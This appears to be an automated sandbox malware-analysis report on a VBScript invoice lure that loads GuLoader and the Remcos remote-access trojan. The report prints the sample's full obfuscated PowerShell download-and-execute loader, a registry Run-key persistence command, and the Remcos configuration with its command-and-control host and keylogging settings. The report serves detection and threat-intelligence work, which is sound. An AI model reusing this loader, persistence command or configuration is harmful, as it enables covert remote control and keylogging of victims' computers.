Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
IMGRO Facturi nepl#U0103tite 56773567583658567835244234Bandido.vbs

Overview

General Information

Sample name:IMGRO Facturi nepl#U0103tite 56773567583658567835244234Bandido.vbs
renamed because original name is a hash value
Original sample name:IMGRO Facturi nepltite 56773567583658567835244234Bandido.vbs
Analysis ID:1538533
MD5:a8da570deac5f16a0050802c0da5d7dd
SHA1:9d8992e3770e41d8a431350e1cef73492dc240ea
SHA256:c51c0afd1207879df1f42ac10c7c0bca5397c6b461a6423dbe58b091dc659e6d
Tags:vbsuser-lowmal3
Infos:

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Remcos RAT
Early bird code injection technique detected
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Remcos
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Potential evasive VBS script found (sleep loop)
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Uses ping.exe to check the status of other devices and networks
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 7768 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IMGRO Facturi nepl#U0103tite 56773567583658567835244234Bandido.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • PING.EXE (PID: 7808 cmdline: ping gormezl_6777.6777.6777.677e MD5: 2F46799D79D22AC72C241EC0322B011D)
      • conhost.exe (PID: 7816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7876 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Servicetilbuds Fangerne Sidsernes Cormidium Brnesangen Pouty #>;$Tredjeverdenslandets='Bilberries43';<#Efterordenes fjedervgt Soubrettens leftism Radiography #>;$Saltvandsfisk=$selvvirkendes+$host.UI; function pepperiness($Klassesttet){If ($Saltvandsfisk) {$Envisaging++;}$possesses=$Unlimned+$Klassesttet.'Length'-$Envisaging; for( $Multiciliated=4;$Multiciliated -lt $possesses;$Multiciliated+=5){$Aithochroi56=$Multiciliated;$Politiskoler+=$Klassesttet[$Multiciliated];$Opbyggeligste='Weltanschauung';}$Politiskoler;}function Isopor($jomfrunalske){ & ($Hovedkarakterer) ($jomfrunalske);}$Folkeskoleomraadet=pepperiness 'IsolMAnlgoEffez noriEssolGanglin,ta Lig/ Bl, ';$Folkeskoleomraadet+=pepperiness 'Refr5ra e.Spot0omda Mulc(IndtW DisiBespn Dd dModao A,cwKultsFedt igN avT Ten fi.1slay0Thom.Unde0Stav;Ahop Lo iW teriKravnKurs6Sis.4Engr;Tank HjrxOpti6Rhyp4Incr; ete TrasrGeo v ,es: yr1Dile3 Tai1 Bio. alg0 Pos)Perp ForsG OuteMaancZan.kCathoBart/ Che2Vold0Pauc1Sluk0 Chi0 S a1 ea0w.re1Prog GynoFBelviLokar ndeeLegefHe soNonrxNett/halv1,eta3Ku m1Data.Upbu0 Gui ';$Efterords=pepperiness 'DiktuPhotsOverE orlrK.od-Job aForbg KofeSy,bnRisitProg ';$Ordreafgivelser=pepperiness 'UnmehTeletGrost enpImplsUdtr:Sols/Mora/Kanopov rlP rsi AlleSenslForstBlyadB,nz.Hy.etbil,oR afpBakk/BeasT isclUdtnlChile B esIdio1Barb8glut7Time.F,agdMadke S lpDokul In oSendySubc ';$haole=pepperiness 'tetr>Wels ';$Hovedkarakterer=pepperiness 'CockIdumhe SinXAnse ';$Kontrahering='Tekstlig';$Jackhammer='\Clothesman.Vin';Isopor (pepperiness 'Thig$ BraGStemlCordoMarvBPostaEthiLCibo:OverE psVTe.meJagtLSatiE,easeDe enArmhs Asp=Unit$Brute OttnS utVexpr:T,veaEncrp HaaP ondalfaAPe sT HofAsymp+Bobs$ Kvsj En AMatacMisakNoteH,orlaTomeMPeptMPrese oldRBus ');Isopor (pepperiness 'Hard$Und gSociLTveto WoobPar anotal ead:SkamfHestoUdsiRDraiMDissA A tlpo,yIDis SKrameart S Sen=Chil$disiOWorrr eaDDemoR MaeEFigeaF gef Drag limIRe.rvForaECuralEd csReolEKobbr Cla.StatS,lebp LisL LanIBoggtS ag(H,po$SemihMa,iASnito.onpLOctreacet)Told ');Isopor (pepperiness ' Und[SwifnstabETsumT.agt.ForuSGeneERadircemev StriTilnC .ekEOctopRed.oKleiI Sa NGav.T bscM,kraAUnclNBnnea,nnigPh,ce MolR nrt] B,l:Succ:MusksProgev.rdcSt.aUFl.tRd ndI FlytJaywYjvnfpParaRWineOInfithummoDolocRom oSignLMidt Cecr=Foru Excr[Kaian.emie.lgttU ru. RhasH,rpeve,ecEndiuAsteRPro iLallT egeYTuvaPT anroutgoFarmT TabODyrlcStauOBobbL StuTVoicy ussPU saeAtio]Oec,:grat: esstMidnlchteS Non1Ca.o2Ddsr ');$Ordreafgivelser=$Formalises[0];$Gammel=(pepperiness 'S it$predgEstalLe iOUninbK alaEnteL Sax:M drL nivIIntent kuIParmESvrtn CyluBo.dm ComMCr dePlicrSynteSkylr disiB,rrnP rsGJeopeKravrskld= PosN taoERepewDugp- Geno AdebMilij ti EGalvcImprtPi.k autoS marYFor.S,aratStudeUnflMT,ta.SkatNPepeE IgntHjem.DephwUdtrEHrigBDevaCOrdsl ForISalte ilinSy,cthust ');Isopor ($Gammel);Isopor (pepperiness 'Kvid$intelIndbi NebnMilii Tote HypnSnuruReprmVitamM.tteU.virEnhee ClirSnd iNovenDeflg.orkeAerorMorb.TawpHRunoeLullade rdDerfeDagsrBe,tsStre[Forb$modiE AfrfWheetNonce co.rTermo.ragrB.lodKlags Int]O tl=Ek,k$VersFA shoGldelFor kA seeU,nvslopskForso anl,edteDrogoRumfmGlosrSesaaGrnlaAnatdSrileS,uttLawy ');$cosmozoism=pepperiness 'Afve$TelelBryliLys,n nniiOv reFu dnVirkuV dem Emam V neRctsrSaeseEtior riliUn.rnSt,agSubaeAf irOutb. rbeD BlooVan w ndnDipllVaaroWoora nond HetFnon iFormlLandeAci (,ill$ aerO repr Ob d PrerAn.heNavnaPresf otagFulwi agtvAmmoeTid lSoupsB uge subrShi.,Elsk$ StrS penp ,egoS gdnImp.g eryiUndeo Rusp imol unoaReissTeksm SmuiTo dcRust) Tek ';$Spongioplasmic=$Eveleens;Isopor (pepperiness 'Udem$BortG Po lGobyoInvab nikaPeril Maz:DiskI ForNAcraDabsttB ndSUforE BloDPr aeBrak=mi c(Udt TNedjeStedsBe atOkke-SnubpLaerASoriT.ineH ska R,ti$ B,iS.nesp K iOse,in yomg novIS ygOKontP S dlCenta VilsBatcM knii HekC Svi) Unm ');while (!$Indtsede) {Isopor (pepperiness ' M s$FaragOve.l TreoRetibR koaClogl usl:F,stSTurbkSmalu ecke GresDo ip ,tvi .onlattelMin,eSad.rVltee.edrv LoenDerme E e= Bio$ kvtExt rRealuCel eEqua ') ;Isopor $cosmozoism;Isopor (pepperiness 'FishsFoelTKonfa Po r Rh TUdve-G,mnsUnpulPosseObjeEhellpOpsa Tetr4 Cor ');Isopor (pepperiness 'Ny.e$ ocGSvmmL HecoDistB,ortA FraLPrez:SensiTuskNDov dMakst EkssspineUninDTrosETakt= Bor( Urit Afse pensDeprtE ep- WasP ieaForeT rocH Haa Per$Re.isSocipSkilO DomNPul,gConvIParaOud epHyl,L O,eAClanSE olM apiNavnc esk)Raad ') ;Isopor (pepperiness 'Uddy$ PreGRedelH reO imibKredANo dlR.gi:,vinpSilkAWadsNtrondSlavEFunkHFodbuwoadLa,dsEKlasrDovn=A au$U feGClamlOm,oO StubS.xoAT rsLAlfa: rbesHealtForbOUnpor Undkpr,nu ShonPeplDS,aieCymbRVareaG.ldbB anAIch TTrniTAzonerun.N enfsw ir+Konv+Udf % Afg$ HvifArchoTeleROve mBap aRi ll Li I TvaS ickELnnuSConc.BehacVis,oUnsauHngen In t.igm ') ;$Ordreafgivelser=$Formalises[$pandehuler];}$Bortvend=334373;$Blodbanken=30661;Isopor (pepperiness ' For$DandGEnkeLMunkO T.nbT rsA ejnlInat: ptrC tidHUmb aGallR drbLTyndaBr.odToccyIndi Cl =Elem RodGOut eLageTVrik- SolcNickOTacknDrnlt SameBo,kN UletG.nf .gil$ SamsSandpTassoCottnPrdegRatiICreaOWandpwom LRea.a AskSBenaM TomiUdh CFree ');Isopor (pepperiness 'H lh$KradgNudelSk.io ProbKol,a ndelT,bs:HverJ,rtioNapabRicob Pr,eBolir enneStannTuers Fen Rib=Gnav Sleu[ParaSVeneyGratsCro tBullebresm Sub.FortCSi noHungn V,tvSkoveDiser Fortarau]Noni:Repu:OverFMn drStymo DemmPea BKollaLumbs Th,eUnre6 ,xp4Pr,vS RegtV,abrMiliiSyrlnAldrgerho(k rn$ psc nohtypeaPinsr osclGranaSistdGranyTerr)Brac ');Isopor (pepperiness 'Fore$GormgStemLSpolOStalBDid.a Eftlh ng:morttPr.guCoroCOverKGoweT RehoMohiO Tog Non = Raa Vagt[ Hovs CitYFostsTaabt jorEQui m om. ntiTGle,e UnoxCurlTOrga.,utrEZerenSub cChemOInfoDAdviiNedsN AdiGThou]Shun:Pers:tennaHimnSB.glCich.IKontiSosi. amegRoyae AprtSmmeSSandtUn,rRe vii Pr NFa sgRokk(Tank$Portj arnOLienBCle,BSpanEBigurParaE merN PonSSpo.)Odyl ');Isopor (pepperiness 'Unbu$UdtaG orhl ylOMar be spa CollMega:Molis TurEDortM T tIHoraCcsiuOItern GalV I aEL miNForeTPre,I aenOO ern NstAU ldl ssuI inktTs rYKnib=Skru$FiskTTronuFri.cstorK N nTUncooSadeoChan.M mbs PaaUHaanbDia,SAbantFamirquadi leunKampgSemi(Shin$ Un BSupeo BegR.lurtTi.vvAq aeSkrln SladEmne,Unde$ BorbForelAl.eO AdrdPro BTopmAScruNGurgkbrkneBlu N Lla) Una ');Isopor $Semiconventionality;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 8168 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Servicetilbuds Fangerne Sidsernes Cormidium Brnesangen Pouty #>;$Tredjeverdenslandets='Bilberries43';<#Efterordenes fjedervgt Soubrettens leftism Radiography #>;$Saltvandsfisk=$selvvirkendes+$host.UI; function pepperiness($Klassesttet){If ($Saltvandsfisk) {$Envisaging++;}$possesses=$Unlimned+$Klassesttet.'Length'-$Envisaging; for( $Multiciliated=4;$Multiciliated -lt $possesses;$Multiciliated+=5){$Aithochroi56=$Multiciliated;$Politiskoler+=$Klassesttet[$Multiciliated];$Opbyggeligste='Weltanschauung';}$Politiskoler;}function Isopor($jomfrunalske){ & ($Hovedkarakterer) ($jomfrunalske);}$Folkeskoleomraadet=pepperiness 'IsolMAnlgoEffez noriEssolGanglin,ta Lig/ Bl, ';$Folkeskoleomraadet+=pepperiness 'Refr5ra e.Spot0omda Mulc(IndtW DisiBespn Dd dModao A,cwKultsFedt igN avT Ten fi.1slay0Thom.Unde0Stav;Ahop Lo iW teriKravnKurs6Sis.4Engr;Tank HjrxOpti6Rhyp4Incr; ete TrasrGeo v ,es: yr1Dile3 Tai1 Bio. alg0 Pos)Perp ForsG OuteMaancZan.kCathoBart/ Che2Vold0Pauc1Sluk0 Chi0 S a1 ea0w.re1Prog GynoFBelviLokar ndeeLegefHe soNonrxNett/halv1,eta3Ku m1Data.Upbu0 Gui ';$Efterords=pepperiness 'DiktuPhotsOverE orlrK.od-Job aForbg KofeSy,bnRisitProg ';$Ordreafgivelser=pepperiness 'UnmehTeletGrost enpImplsUdtr:Sols/Mora/Kanopov rlP rsi AlleSenslForstBlyadB,nz.Hy.etbil,oR afpBakk/BeasT isclUdtnlChile B esIdio1Barb8glut7Time.F,agdMadke S lpDokul In oSendySubc ';$haole=pepperiness 'tetr>Wels ';$Hovedkarakterer=pepperiness 'CockIdumhe SinXAnse ';$Kontrahering='Tekstlig';$Jackhammer='\Clothesman.Vin';Isopor (pepperiness 'Thig$ BraGStemlCordoMarvBPostaEthiLCibo:OverE psVTe.meJagtLSatiE,easeDe enArmhs Asp=Unit$Brute OttnS utVexpr:T,veaEncrp HaaP ondalfaAPe sT HofAsymp+Bobs$ Kvsj En AMatacMisakNoteH,orlaTomeMPeptMPrese oldRBus ');Isopor (pepperiness 'Hard$Und gSociLTveto WoobPar anotal ead:SkamfHestoUdsiRDraiMDissA A tlpo,yIDis SKrameart S Sen=Chil$disiOWorrr eaDDemoR MaeEFigeaF gef Drag limIRe.rvForaECuralEd csReolEKobbr Cla.StatS,lebp LisL LanIBoggtS ag(H,po$SemihMa,iASnito.onpLOctreacet)Told ');Isopor (pepperiness ' Und[SwifnstabETsumT.agt.ForuSGeneERadircemev StriTilnC .ekEOctopRed.oKleiI Sa NGav.T bscM,kraAUnclNBnnea,nnigPh,ce MolR nrt] B,l:Succ:MusksProgev.rdcSt.aUFl.tRd ndI FlytJaywYjvnfpParaRWineOInfithummoDolocRom oSignLMidt Cecr=Foru Excr[Kaian.emie.lgttU ru. RhasH,rpeve,ecEndiuAsteRPro iLallT egeYTuvaPT anroutgoFarmT TabODyrlcStauOBobbL StuTVoicy ussPU saeAtio]Oec,:grat: esstMidnlchteS Non1Ca.o2Ddsr ');$Ordreafgivelser=$Formalises[0];$Gammel=(pepperiness 'S it$predgEstalLe iOUninbK alaEnteL Sax:M drL nivIIntent kuIParmESvrtn CyluBo.dm ComMCr dePlicrSynteSkylr disiB,rrnP rsGJeopeKravrskld= PosN taoERepewDugp- Geno AdebMilij ti EGalvcImprtPi.k autoS marYFor.S,aratStudeUnflMT,ta.SkatNPepeE IgntHjem.DephwUdtrEHrigBDevaCOrdsl ForISalte ilinSy,cthust ');Isopor ($Gammel);Isopor (pepperiness 'Kvid$intelIndbi NebnMilii Tote HypnSnuruReprmVitamM.tteU.virEnhee ClirSnd iNovenDeflg.orkeAerorMorb.TawpHRunoeLullade rdDerfeDagsrBe,tsStre[Forb$modiE AfrfWheetNonce co.rTermo.ragrB.lodKlags Int]O tl=Ek,k$VersFA shoGldelFor kA seeU,nvslopskForso anl,edteDrogoRumfmGlosrSesaaGrnlaAnatdSrileS,uttLawy ');$cosmozoism=pepperiness 'Afve$TelelBryliLys,n nniiOv reFu dnVirkuV dem Emam V neRctsrSaeseEtior riliUn.rnSt,agSubaeAf irOutb. rbeD BlooVan w ndnDipllVaaroWoora nond HetFnon iFormlLandeAci (,ill$ aerO repr Ob d PrerAn.heNavnaPresf otagFulwi agtvAmmoeTid lSoupsB uge subrShi.,Elsk$ StrS penp ,egoS gdnImp.g eryiUndeo Rusp imol unoaReissTeksm SmuiTo dcRust) Tek ';$Spongioplasmic=$Eveleens;Isopor (pepperiness 'Udem$BortG Po lGobyoInvab nikaPeril Maz:DiskI ForNAcraDabsttB ndSUforE BloDPr aeBrak=mi c(Udt TNedjeStedsBe atOkke-SnubpLaerASoriT.ineH ska R,ti$ B,iS.nesp K iOse,in yomg novIS ygOKontP S dlCenta VilsBatcM knii HekC Svi) Unm ');while (!$Indtsede) {Isopor (pepperiness ' M s$FaragOve.l TreoRetibR koaClogl usl:F,stSTurbkSmalu ecke GresDo ip ,tvi .onlattelMin,eSad.rVltee.edrv LoenDerme E e= Bio$ kvtExt rRealuCel eEqua ') ;Isopor $cosmozoism;Isopor (pepperiness 'FishsFoelTKonfa Po r Rh TUdve-G,mnsUnpulPosseObjeEhellpOpsa Tetr4 Cor ');Isopor (pepperiness 'Ny.e$ ocGSvmmL HecoDistB,ortA FraLPrez:SensiTuskNDov dMakst EkssspineUninDTrosETakt= Bor( Urit Afse pensDeprtE ep- WasP ieaForeT rocH Haa Per$Re.isSocipSkilO DomNPul,gConvIParaOud epHyl,L O,eAClanSE olM apiNavnc esk)Raad ') ;Isopor (pepperiness 'Uddy$ PreGRedelH reO imibKredANo dlR.gi:,vinpSilkAWadsNtrondSlavEFunkHFodbuwoadLa,dsEKlasrDovn=A au$U feGClamlOm,oO StubS.xoAT rsLAlfa: rbesHealtForbOUnpor Undkpr,nu ShonPeplDS,aieCymbRVareaG.ldbB anAIch TTrniTAzonerun.N enfsw ir+Konv+Udf % Afg$ HvifArchoTeleROve mBap aRi ll Li I TvaS ickELnnuSConc.BehacVis,oUnsauHngen In t.igm ') ;$Ordreafgivelser=$Formalises[$pandehuler];}$Bortvend=334373;$Blodbanken=30661;Isopor (pepperiness ' For$DandGEnkeLMunkO T.nbT rsA ejnlInat: ptrC tidHUmb aGallR drbLTyndaBr.odToccyIndi Cl =Elem RodGOut eLageTVrik- SolcNickOTacknDrnlt SameBo,kN UletG.nf .gil$ SamsSandpTassoCottnPrdegRatiICreaOWandpwom LRea.a AskSBenaM TomiUdh CFree ');Isopor (pepperiness 'H lh$KradgNudelSk.io ProbKol,a ndelT,bs:HverJ,rtioNapabRicob Pr,eBolir enneStannTuers Fen Rib=Gnav Sleu[ParaSVeneyGratsCro tBullebresm Sub.FortCSi noHungn V,tvSkoveDiser Fortarau]Noni:Repu:OverFMn drStymo DemmPea BKollaLumbs Th,eUnre6 ,xp4Pr,vS RegtV,abrMiliiSyrlnAldrgerho(k rn$ psc nohtypeaPinsr osclGranaSistdGranyTerr)Brac ');Isopor (pepperiness 'Fore$GormgStemLSpolOStalBDid.a Eftlh ng:morttPr.guCoroCOverKGoweT RehoMohiO Tog Non = Raa Vagt[ Hovs CitYFostsTaabt jorEQui m om. ntiTGle,e UnoxCurlTOrga.,utrEZerenSub cChemOInfoDAdviiNedsN AdiGThou]Shun:Pers:tennaHimnSB.glCich.IKontiSosi. amegRoyae AprtSmmeSSandtUn,rRe vii Pr NFa sgRokk(Tank$Portj arnOLienBCle,BSpanEBigurParaE merN PonSSpo.)Odyl ');Isopor (pepperiness 'Unbu$UdtaG orhl ylOMar be spa CollMega:Molis TurEDortM T tIHoraCcsiuOItern GalV I aEL miNForeTPre,I aenOO ern NstAU ldl ssuI inktTs rYKnib=Skru$FiskTTronuFri.cstorK N nTUncooSadeoChan.M mbs PaaUHaanbDia,SAbantFamirquadi leunKampgSemi(Shin$ Un BSupeo BegR.lurtTi.vvAq aeSkrln SladEmne,Unde$ BorbForelAl.eO AdrdPro BTopmAScruNGurgkbrkneBlu N Lla) Una ');Isopor $Semiconventionality;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 8176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 1012 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • cmd.exe (PID: 7432 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Sandsynliggrelsens" /t REG_EXPAND_SZ /d "%Hexokinase% -windowstyle 1 $Jordbundssammenstnings=(gp -Path 'HKCU:\Software\Skulptureredes\').carlcorey;%Hexokinase% ($Jordbundssammenstnings)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 2136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 7664 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Sandsynliggrelsens" /t REG_EXPAND_SZ /d "%Hexokinase% -windowstyle 1 $Jordbundssammenstnings=(gp -Path 'HKCU:\Software\Skulptureredes\').carlcorey;%Hexokinase% ($Jordbundssammenstnings)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": ["pelele.duckdns.org:51525:1"], "Assigned name": "MISS Chy", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-TXCR8B", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000000A.00000002.2937740641.0000000007D00000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000005.00000002.1994393544.00000000089E0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
        0000000A.00000002.2949377378.000000002377E000.00000004.00000010.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          0000000A.00000002.2937740641.0000000007CD0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
            00000005.00000002.1982397865.0000000005F76000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
              Click to see the 7 entries

              Other

              SourceRuleDescriptionAuthorStrings
              amsi64_7876.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                amsi32_8168.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
                • 0xc479:$b2: ::FromBase64String(
                • 0xb4e5:$s1: -join
                • 0x4c91:$s4: +=
                • 0x4d53:$s4: +=
                • 0x8f7a:$s4: +=
                • 0xb097:$s4: +=
                • 0xb381:$s4: +=
                • 0xb4c7:$s4: +=
                • 0x155ff:$s4: +=
                • 0x1567f:$s4: +=
                • 0x15745:$s4: +=
                • 0x157c5:$s4: +=
                • 0x1599b:$s4: +=
                • 0x15a1f:$s4: +=
                • 0xbd1e:$e4: Get-WmiObject
                • 0xbf0d:$e4: Get-Process
                • 0xbf65:$e4: Start-Process
                • 0x16290:$e4: Get-Process

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: WScript or CScript Dropper
                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IMGRO Facturi nepl#U0103tite 56773567583658567835244234Bandido.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IMGRO Facturi nepl#U0103tite 56773567583658567835244234Bandido.vbs", CommandLine|base64offset|contains: -, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IMGRO Facturi nepl#U0103tite 56773567583658567835244234Bandido.vbs", ProcessId: 7768, ProcessName: wscript.exe
                Sigma detected: CurrentVersion Autorun Keys Modification
                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: %Hexokinase% -windowstyle 1 $Jordbundssammenstnings=(gp -Path 'HKCU:\Software\Skulptureredes\').carlcorey;%Hexokinase% ($Jordbundssammenstnings), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 7664, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Sandsynliggrelsens
                Sigma detected: Direct Autorun Keys Modification
                Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Sandsynliggrelsens" /t REG_EXPAND_SZ /d "%Hexokinase% -windowstyle 1 $Jordbundssammenstnings=(gp -Path 'HKCU:\Software\Skulptureredes\').carlcorey;%Hexokinase% ($Jordbundssammenstnings)", CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Sandsynliggrelsens" /t REG_EXPAND_SZ /d "%Hexokinase% -windowstyle 1 $Jordbundssammenstnings=(gp -Path 'HKCU:\Software\Skulptureredes\').carlcorey;%Hexokinase% ($Jordbundssammenstnings)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Sandsynliggrelsens" /t REG_EXPAND_SZ /d "%Hexokinase% -windowstyle 1 $Jordbundssammenstnings=(gp -Path 'HKCU:\Software\Skulptureredes\').carlcorey;%Hexokinase% ($Jordbundssammenstnings)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7432, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Sandsynliggrelsens" /t REG_EXPAND_SZ /d "%Hexokinase% -windowstyle 1 $Jordbundssammenstnings=(gp -Path 'HKCU:\Software\Skulptureredes\').carlcorey;%Hexokinase% ($Jordbundssammenstnings)", ProcessId: 7664, ProcessName: reg.exe
                Sigma detected: Msiexec Initiated Connection
                Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 172.67.155.139, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 1012, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49744
                Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Sandsynliggrelsens" /t REG_EXPAND_SZ /d "%Hexokinase% -windowstyle 1 $Jordbundssammenstnings=(gp -Path 'HKCU:\Software\Skulptureredes\').carlcorey;%Hexokinase% ($Jordbundssammenstnings)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Sandsynliggrelsens" /t REG_EXPAND_SZ /d "%Hexokinase% -windowstyle 1 $Jordbundssammenstnings=(gp -Path 'HKCU:\Software\Skulptureredes\').carlcorey;%Hexokinase% ($Jordbundssammenstnings)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, 